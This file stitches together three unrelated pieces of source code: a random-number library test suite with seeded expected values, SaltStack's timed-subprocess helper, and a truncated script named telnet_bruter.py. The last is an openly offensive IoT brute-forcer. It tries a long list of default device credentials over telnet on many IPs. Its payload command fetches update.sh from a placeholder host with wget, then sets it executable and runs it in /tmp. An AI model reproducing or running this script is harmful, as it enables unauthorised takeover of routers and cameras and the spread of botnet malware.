ubnd = 2 if dt is np.bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertFalse(hasattr(sample, 'dtype'))
self.assertEqual(type(sample), dt)
class TestRandomDist_Intel(TestCase):
    # Make sure the random distribution returns the correct value for a
    # given seed. The low value of the decimal argument is intentional, since the
    # functional transformations (or approximations thereof) used to produce
    # non-uniform random variates can vary across platforms while remaining
    # statistically indistinguishable to the end user, i.e. no computationally
    # feasible statistical experiment can detect the difference.
def setUp(self):
self.seed = 1234567890
self.brng = 'SFMT19937'
def test_rand(self):
rnd.seed(self.seed, self.brng)
actual = rnd.rand(3, 2)
desired = np.array([[0.9838694715872407, 0.019142669625580311],
[0.1767608025111258, 0.70966427633538842],
[0.518550637178123, 0.98780936631374061]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_randn(self):
rnd.seed(self.seed, self.brng)
actual = rnd.randn(3, 2)
desired = np.array([[2.1411609928913298, -2.0717866791744819],
[-0.92778018318550248, 0.55240420724917727],
[0.04651632135517459, 2.2510674226058036]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_randint(self):
rnd.seed(self.seed, self.brng)
actual = rnd.randint(-99, 99, size=(3, 2))
desired = np.array([[95, -96], [-65, 41], [3, 96]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers(self):
rnd.seed(self.seed, self.brng)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = rnd.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[96, -96], [-64, 42], [4, 97]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = rnd.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
np.testing.assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
rnd.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
rnd.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
rnd.seed(self.seed, self.brng)
actual = rnd.random_sample((3, 2))
desired = np.array([[0.9838694715872407, 0.01914266962558031],
[0.1767608025111258, 0.7096642763353884],
[0.518550637178123, 0.9878093663137406]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_choice_uniform_replace(self):
rnd.seed(self.seed, self.brng)
actual = rnd.choice(4, 4)
desired = np.array([3, 0, 0, 2])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
rnd.seed(self.seed, self.brng)
actual = rnd.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([3, 0, 0, 1])
np.testing.assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
rnd.seed(self.seed, self.brng)
actual = rnd.choice(4, 3, replace=False)
desired = np.array([2, 1, 3])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
rnd.seed(self.seed, self.brng)
actual = rnd.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([3, 0, 1])
np.testing.assert_array_equal(actual, desired)
def test_choice_noninteger(self):
rnd.seed(self.seed, self.brng)
actual = rnd.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['d', 'a', 'a', 'c'])
np.testing.assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = rnd.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2, replace=False,
p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(rnd.choice(2, replace=True)))
assert_(np.isscalar(rnd.choice(2, replace=False)))
assert_(np.isscalar(rnd.choice(2, replace=True, p=p)))
assert_(np.isscalar(rnd.choice(2, replace=False, p=p)))
assert_(np.isscalar(rnd.choice([1, 2], replace=True)))
assert_(rnd.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(rnd.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(rnd.choice(2, s, replace=True)))
assert_(not np.isscalar(rnd.choice(2, s, replace=False)))
assert_(not np.isscalar(rnd.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(rnd.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(rnd.choice([1, 2], s, replace=True)))
assert_(rnd.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(rnd.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
        assert_equal(rnd.choice(6, s, replace=True).shape, s)
        assert_equal(rnd.choice(6, s, replace=False).shape, s)
        assert_equal(rnd.choice(6, s, replace=True, p=p).shape, s)
        assert_equal(rnd.choice(6, s, replace=False, p=p).shape, s)
        assert_equal(rnd.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
rnd.seed(self.seed, self.brng)
actual = rnd.bytes(10)
desired = asbytes('\xa4\xde\xde{\xb4\x88\xe6\x84*2')
np.testing.assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
rnd.seed(self.seed, self.brng)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
rnd.shuffle(alist)
actual = alist
desired = conv([9, 8, 5, 1, 6, 4, 7, 2, 3, 0])
np.testing.assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5,4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
rnd.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
rnd.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
rnd.seed(self.seed, self.brng)
actual = rnd.beta(.1, .9, size=(3, 2))
desired = np.array(
[[0.9856952034381025, 4.35869375658114e-08],
[0.0014230232791189966, 1.4981856288121975e-06],
[1.426135763875603e-06, 4.5801786040477326e-07]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_binomial(self):
rnd.seed(self.seed, self.brng)
actual = rnd.binomial(100.123, .456, size=(3, 2))
desired = np.array([[43, 48], [55, 48], [46, 53]])
np.testing.assert_array_equal(actual, desired)
def test_chisquare(self):
rnd.seed(self.seed, self.brng)
actual = rnd.chisquare(50, size=(3, 2))
desired = np.array([[50.955833609920589, 50.133178918244099],
[61.513615847062013, 50.757127871422448],
[52.79816819717081, 49.973023331993552]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_dirichlet(self):
rnd.seed(self.seed, self.brng)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = rnd.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.6332947001908874, 0.36670529980911254],
[0.5376828907571894, 0.4623171092428107]],
[[0.6835615930093024, 0.3164384069906976],
[0.5452378139016114, 0.45476218609838875]],
[[0.6498494402738553, 0.3501505597261446],
[0.5622024400324822, 0.43779755996751785]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(rnd.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(rnd.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(rnd.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(rnd.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, rnd.dirichlet, p, np.float(1))
def test_exponential(self):
rnd.seed(self.seed, self.brng)
actual = rnd.exponential(1.1234, size=(3, 2))
desired = np.array([[0.01826877748252199, 4.4439855151117005],
[1.9468048583654507, 0.38528493864979607],
[0.7377565464231758, 0.013779117663987912]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_f(self):
rnd.seed(self.seed, self.brng)
actual = rnd.f(12, 77, size=(3, 2))
desired = np.array([[1.325076177478387, 0.8670927327120197],
[2.1190792007836827, 0.9095296301824258],
[1.4953697422236187, 0.9547125618834837]])
np.testing.assert_array_almost_equal(actual, desired, decimal=9)
def test_gamma(self):
rnd.seed(self.seed, self.brng)
actual = rnd.gamma(5, 3, size=(3, 2))
desired = np.array([[15.073510060334929, 14.525495858042685],
[22.73897210140115, 14.94044782480266],
[16.327929995271095, 14.419692564592896]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_geometric(self):
rnd.seed(self.seed, self.brng)
actual = rnd.geometric(.123456789, size=(3, 2))
desired = np.array([[0, 30], [13, 2], [4, 0]])
np.testing.assert_array_equal(actual, desired)
def test_gumbel(self):
rnd.seed(self.seed, self.brng)
actual = rnd.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-8.114386462751979, 2.873840411460178],
[1.2231161758452016, -2.0168070493213532],
[-0.7175455966332102, -8.678464904504784]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_hypergeometric(self):
rnd.seed(self.seed, self.brng)
actual = rnd.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 9], [9, 10], [9, 10]])
np.testing.assert_array_equal(actual, desired)
# Test nbad = 0
actual = rnd.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
np.testing.assert_array_equal(actual, desired)
actual = rnd.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
np.testing.assert_array_equal(actual, desired)
# Test ngood = 0
actual = rnd.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
actual = rnd.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
def test_laplace(self):
rnd.seed(self.seed, self.brng)
actual = rnd.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.15598087210935016, -3.3424589282252994],
[-1.189978401356375, 3.0607925598732253],
[0.0030946589024587745, 3.14795824463997]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_logistic(self):
rnd.seed(self.seed, self.brng)
actual = rnd.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[8.345015961402696, -7.749557532940552],
[-2.9534419690278444, 1.910964962531448],
[0.2719300361499433, 8.913100396613983]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_lognormal(self):
rnd.seed(self.seed, self.brng)
actual = rnd.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[81.92291750917155, 0.01795087229603931],
[0.1769118704670423, 3.415299544410577],
[1.2417099625339398, 102.0631392685238]])
np.testing.assert_array_almost_equal(actual, desired, decimal=6)
actual = rnd.lognormal(mean=.123456789, sigma=2.0, size=(3,2),
method='Box-Muller2')
desired = np.array([[0.2585388231094821, 0.43734953048924663],
[26.050836228611697, 26.76266237820882],
[0.24216420175675096, 0.2481945765083541]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_logseries(self):
rnd.seed(self.seed, self.brng)
actual = rnd.logseries(p=.923456789, size=(3, 2))
desired = np.array([[18, 1], [1, 1], [5, 19]])
np.testing.assert_array_equal(actual, desired)
def test_multinomial(self):
rs = rnd.RandomState(self.seed, brng=self.brng)
actual = rs.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.full((3, 2), 20, dtype=actual.dtype)
np.testing.assert_array_equal(actual.sum(axis=-1), desired)
expected = np.array([
[[6, 2, 1, 3, 2, 6], [7, 5, 1, 2, 3, 2]],
[[5, 1, 8, 3, 2, 1], [4, 6, 0, 4, 4, 2]],
[[6, 3, 1, 4, 4, 2], [3, 2, 4, 2, 1, 8]]], actual.dtype)
np.testing.assert_array_equal(actual, expected)
def test_multivariate_normal(self):
rnd.seed(self.seed, self.brng)
mean = (.123456789, 10)
# Hmm... not even symmetric.
cov = [[1, 0], [1, 0]]
size = (3, 2)
actual = rnd.multivariate_normal(mean, cov, size)
desired = np.array([[[-2.42282709811266, 10.0],
[1.2267795840027274, 10.0]],
[[0.06813924868067336, 10.0],
[1.001190462507746, 10.0]],
[[-1.74157261455869, 10.0],
[1.0400952859037553, 10.0]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
# Check for default size, was raising deprecation warning
actual = rnd.multivariate_normal(mean, cov)
desired = np.array([1.0579899448949994, 10.0])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
# Check that non positive-semidefinite covariance raises warning
mean = [0, 0]
cov = [[1, 1 + 1e-10], [1 + 1e-10, 1]]
assert_warns(RuntimeWarning, rnd.multivariate_normal, mean, cov)
def test_multinormal_cholesky(self):
rnd.seed(self.seed, self.brng)
mean = (.123456789, 10)
# lower-triangular cholesky matrix
chol_mat = [[1, 0], [-0.5, 1]]
size = (3, 2)
actual = rnd.multinormal_cholesky(mean, chol_mat, size, method='ICDF')
desired = np.array([[[2.26461778189133, 6.857632824379853],
[-0.8043233941855025, 11.01629429884193]],
[[0.1699731103551746, 12.227809261928217],
[-0.6146263106001378, 9.893801873973892]],
[[1.691753328795276, 10.797627196240155],
[-0.647341237129921, 9.626899489691816]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_negative_binomial(self):
rnd.seed(self.seed, self.brng)
actual = rnd.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[667, 679], [677, 676], [779, 648]])
np.testing.assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
rnd.seed(self.seed, self.brng)
actual = rnd.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[5.871334619375055, 8.756238913383225],
[17.29576535176833, 3.9028417087862177],
[5.1315133729432505, 9.942717979531027]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
actual = rnd.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[0.0008971007339949436, 0.08948578998156566],
[0.6721835871997511, 2.8892645287699352],
[5.0858149962761007e-05, 1.7315797643658821]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_noncentral_f(self):
rnd.seed(self.seed, self.brng)
actual = rnd.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[0.2216297348371284, 0.7632696724492449],
[98.67664232828238, 0.9500319825372799],
[0.3489618249246971, 1.5035633972571092]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_normal(self):
rnd.seed(self.seed, self.brng)
actual = rnd.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[4.405778774782659, -4.020116569348963],
[-1.732103577371005, 1.2282652034983546],
[0.21648943171034918, 4.625591634211608]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
rnd.seed(self.seed, self.brng)
actual = rnd.normal(loc=.123456789, scale=2.0, size=(3, 2), method="BoxMuller")
desired = np.array([[0.16673479781277187, -3.4809986872165952],
[-0.05193761082535492, 3.249201213154922],
[-0.11915582299214138, 3.555636100927892]])
np.testing.assert_array_almost_equal(actual, desired, decimal=8)
rnd.seed(self.seed, self.brng)
actual = rnd.normal(loc=.123456789, scale=2.0, size=(3, 2), method="BoxMuller2")
desired = np.array([[0.16673479781277187, 0.48153966449249175],
[-3.4809986872165952, -0.8101190082826486],
[-0.051937610825354905, 2.4088402362484342]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_pareto(self):
rnd.seed(self.seed, self.brng)
actual = rnd.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[0.14079174875385214, 82372044085468.92],
[1247881.6368437486, 15.086855668610944],
[203.2638558933401, 0.10445383654349749]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.scipy.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
rnd.seed(self.seed, self.brng)
actual = rnd.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[1, 0], [0, 0], [0, 1]])
np.testing.assert_array_equal(actual, desired)
rnd.seed(self.seed, self.brng)
actual = rnd.poisson(lam=1234.56789, size=(3, 2))
desired = np.array([[1310, 1162], [1202, 1254], [1236, 1314]])
np.testing.assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, rnd.poisson, lamneg)
assert_raises(ValueError, rnd.poisson, [lamneg]*10)
assert_raises(ValueError, rnd.poisson, lambig)
assert_raises(ValueError, rnd.poisson, [lambig]*10)
def test_power(self):
rnd.seed(self.seed, self.brng)
actual = rnd.power(a=.123456789, size=(3, 2))
desired = np.array([[0.8765841803224415, 1.2140041091640163e-14],
[8.013574117268635e-07, 0.06216255187464781],
[0.004895628723087296, 0.9054248959192386]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_rayleigh(self):
rnd.seed(self.seed, self.brng)
actual = rnd.rayleigh(scale=10, size=(3, 2))
desired = np.array([[1.80344345931194, 28.127692489122378],
[18.6169699930609, 8.282068232120208],
[11.460520015934597, 1.5662406536967712]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_standard_cauchy(self):
rnd.seed(self.seed, self.brng)
actual = rnd.standard_cauchy(size=(3, 2))
desired = np.array([[19.716487700629912, -16.608240276131227],
[-1.6117703817332278, 0.7739915895826882],
[0.058344614106131, 26.09825325697747]])
np.testing.assert_array_almost_equal(actual, desired, decimal=9)
def test_standard_exponential(self):
rnd.seed(self.seed, self.brng)
actual = rnd.standard_exponential(size=(3, 2))
desired = np.array([[0.016262041554675085, 3.955835423813157],
[1.7329578586126497, 0.3429632710074738],
[0.6567175951781875, 0.012265548926462446]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_standard_gamma(self):
rnd.seed(self.seed, self.brng)
actual = rnd.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[2.939330965027084, 2.799606052259993],
[4.988193705918075, 2.905305108691164],
[3.2630929395548147, 2.772756340265377]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_standard_normal(self):
rnd.seed(self.seed, self.brng)
actual = rnd.standard_normal(size=(3, 2))
desired = np.array([[2.1411609928913298, -2.071786679174482],
[-0.9277801831855025, 0.5524042072491773],
[0.04651632135517459, 2.2510674226058036]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
rnd.seed(self.seed, self.brng)
actual = rnd.standard_normal(size=(3, 2), method='BoxMuller2')
desired = np.array([[0.021639004406385935, 0.17904143774624587],
[-1.8022277381082976, -0.4667878986413243],
[-0.08769719991267745, 1.1426917236242171]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_standard_t(self):
rnd.seed(self.seed, self.brng)
actual = rnd.standard_t(df=10, size=(3, 2))
desired = np.array([[-0.783927044239963, 0.04762883516531178],
[0.7624597987725193, -1.8045540288955506],
[-1.2657694296239195, 0.307870906117017]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_triangular(self):
rnd.seed(self.seed, self.brng)
actual = rnd.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[18.764540652669638, 6.340166306695037],
[8.827752689522429, 13.65605077739865],
[11.732872979633328, 18.970392754850423]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_uniform(self):
rnd.seed(self.seed, self.brng)
actual = rnd.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[10.38982478047721, 1.408218254214153],
[2.8756430713785814, 7.836974412682466],
[6.057706432128325, 10.426505200380925]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = rnd.uniform
np.testing.assert_raises(OverflowError, func, -np.inf, 0)
np.testing.assert_raises(OverflowError, func, 0, np.inf)
# this should not throw any error, since rng can be sampled as fmin*u + fmax*(1-u)
# for 0<u<1 and it stays completely in range
rnd.uniform(fmin, fmax)
# (fmax / 1e17) - fmin is within range, so this should not throw
rnd.uniform(low=fmin, high=fmax / 1e17)
def test_vonmises(self):
rnd.seed(self.seed, self.brng)
actual = rnd.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[1.1027657269593822, 1.2539311427727782],
[2.0281801137277764, 1.3262040229028056],
[0.9510301598100863, 2.0284972823322818]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_vonmises_small(self):
# check infinite loop, gh-4720
rnd.seed(self.seed, self.brng)
r = rnd.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
rnd.seed(self.seed, self.brng)
actual = rnd.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[0.3465678392232347, 0.3594497155916536],
[2.192908727996422, 1.7408141717513501],
[1.1943709105062374, 0.3273455943060196]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_weibull(self):
rnd.seed(self.seed, self.brng)
actual = rnd.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.035129404330214734, 3.058859465984936],
[1.5636393343788513, 0.4189406773709585],
[0.710439924774508, 0.02793103204502023]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_zipf(self):
rnd.seed(self.seed, self.brng)
actual = rnd.zipf(a=1.23, size=(3, 2))
desired = np.array([[62062919, 1], [24, 209712763], [2, 24]])
np.testing.assert_array_equal(actual, desired)
class TestThread_Intel(object):
# make sure each state produces the same sequence even in threads
def setUp(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(rnd.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(rnd.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if (np.intp().dtype.itemsize == 4 and sys.platform == "win32"):
np.testing.assert_array_almost_equal(out1, out2)
else:
np.testing.assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000,6))
if __name__ == "__main__":
run_module_suite()
|
timed_subprocess.py
|
# -*- coding: utf-8 -*-
'''
For running command line executables with a timeout
'''
from __future__ import absolute_import, print_function, unicode_literals
import shlex
import subprocess
import threading
import salt.exceptions
import salt.utils.data
import salt.utils.stringutils
from salt.ext import six
class TimedProc(object):
'''
Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs
'''
def __init__(self, args, **kwargs):
self.wait = not kwargs.pop('bg', False)
self.stdin = kwargs.pop('stdin', None)
self.with_communicate = kwargs.pop('with_communicate', self.wait)
self.timeout = kwargs.pop('timeout', None)
self.stdin_raw_newlines = kwargs.pop('stdin_raw_newlines', False)
# If you're not willing to wait for the process
# you can't define any stdin, stdout or stderr
if not self.wait:
self.stdin = kwargs['stdin'] = None
self.with_communicate = False
elif self.stdin is not None:
if not self.stdin_raw_newlines:
# Translate a newline submitted as '\n' on the CLI to an actual
# newline character.
self.stdin = salt.utils.stringutils.to_bytes(self.stdin.replace('\\n', '\n'))
kwargs['stdin'] = subprocess.PIPE
if not self.with_communicate:
self.stdout = kwargs['stdout'] = None
self.stderr = kwargs['stderr'] = None
if self.timeout and not isinstance(self.timeout, (int, float)):
raise salt.exceptions.TimedProcTimeoutError('Error: timeout {0} must be a number'.format(self.timeout))
try:
self.process = subprocess.Popen(args, **kwargs)
except (AttributeError, TypeError):
if not kwargs.get('shell', False):
if not isinstance(args, (list, tuple)):
try:
args = shlex.split(args)
except AttributeError:
args = shlex.split(six.text_type(args))
str_args = []
for arg in args:
if not isinstance(arg, six.string_types):
str_args.append(six.text_type(arg))
else:
str_args.append(arg)
args = str_args
else:
if not isinstance(args, (list, tuple, six.string_types)):
# Handle corner case where someone does a 'cmd.run 3'
args = six.text_type(args)
# Ensure that environment variables are strings
for key, val in six.iteritems(kwargs.get('env', {})):
if not isinstance(val, six.string_types):
kwargs['env'][key] = six.text_type(val)
if not isinstance(key, six.string_types):
kwargs['env'][six.text_type(key)] = kwargs['env'].pop(key)
if six.PY2 and 'env' in kwargs:
# Ensure no unicode in custom env dict, as it can cause
# problems with subprocess.
kwargs['env'] = salt.utils.data.encode_dict(kwargs['env'])
args = salt.utils.data.decode(args)
self.process = subprocess.Popen(args, **kwargs)
self.command = args
def run(self):
'''
wait for subprocess to terminate and return subprocess' return code.
If timeout is reached, throw TimedProcTimeoutError
'''
def receive():
if self.with_communicate:
self.stdout, self.stderr = self.process.communicate(input=self.stdin)
elif self.wait:
self.process.wait()
if not self.timeout:
receive()
else:
rt = threading.Thread(target=receive)
rt.start()
rt.join(self.timeout)
            if rt.is_alive():
# Subprocess cleanup (best effort)
self.process.kill()
def terminate():
                    if rt.is_alive():
self.process.terminate()
threading.Timer(10, terminate).start()
raise salt.exceptions.TimedProcTimeoutError(
'{0} : Timed out after {1} seconds'.format(
self.command,
six.text_type(self.timeout),
)
)
return self.process.returncode
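if __name__ == '__main__':
    # Minimal usage sketch (not part of the original module): run a short command with a
    # timeout and print its return code and captured output. Assumes a salt checkout is
    # importable so the imports above resolve.
    proc = TimedProc(['echo', 'hello'],
                     stdout=subprocess.PIPE,
                     stderr=subprocess.PIPE,
                     timeout=5)
    try:
        retcode = proc.run()
        print(retcode, proc.stdout)
    except salt.exceptions.TimedProcTimeoutError as exc:
        print('Command timed out: {0}'.format(exc))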
|
telnet_bruter.py
|
#!/usr/bin/python
import threading
import sys, os, re, time, socket
from Queue import *
from sys import stdout
if len(sys.argv) < 4:
print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
sys.exit()
combo = [
"root:root",
"root:",
"admin:admin",
"support:support",
"user:user",
"admin:",
"admin:password",
"root:vizxv",
"root:admin",
"root:xc3511",
"root:888888",
"root:xmhdipc",
"root:default",
"root:juantech",
"root:123456",
"root:54321",
"root:12345",
"root:pass",
"ubnt:ubnt",
"root:klv1234",
"root:Zte521",
"root:hi3518",
"root:jvbzd",
"root:anko",
"root:zlxx.",
"root:7ujMko0vizxv",
"root:7ujMko0admin",
"root:system",
"root:ikwb",
"root:dreambox",
"root:user",
"root:realtek",
"root:00000000",
"admin:1111111",
"admin:1234",
"admin:12345",
"admin:54321",
"admin:123456",
"admin:7ujMko0admin",
"admin:1234",
"admin:pass",
"admin:meinsm",
"admin:admin1234",
"root:1111",
"admin:smcadmin",
"admin:1111",
"root:666666",
"root:password",
"root:1234",
"root:klv123",
"Administrator:admin",
"service:service",
"supervisor:supervisor",
"guest:guest",
"guest:12345",
"guest:12345",
"admin1:password",
"administrator:1234",
"666666:666666",
"888888:888888",
"tech:tech",
"mother:fucker"
]
ips = open(sys.argv[1], "r").readlines()
threads = int(sys.argv[2])
output_file = sys.argv[3]
queue = Queue()
queue_count = 0
for ip in ips:
queue_count += 1
stdout.write("\r[%d] Added to queue" % queue_count)
stdout.flush()
queue.put(ip)
print "\n"
class router(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
self.rekdevice="cd /tmp; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send
def run(self):
global fh
username = ""
password = ""
for passwd in combo:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tn.settimeout(0.37)
tn.connect((self.ip,23))
except Exception:
tn.close()
break
try:
hoho = ''
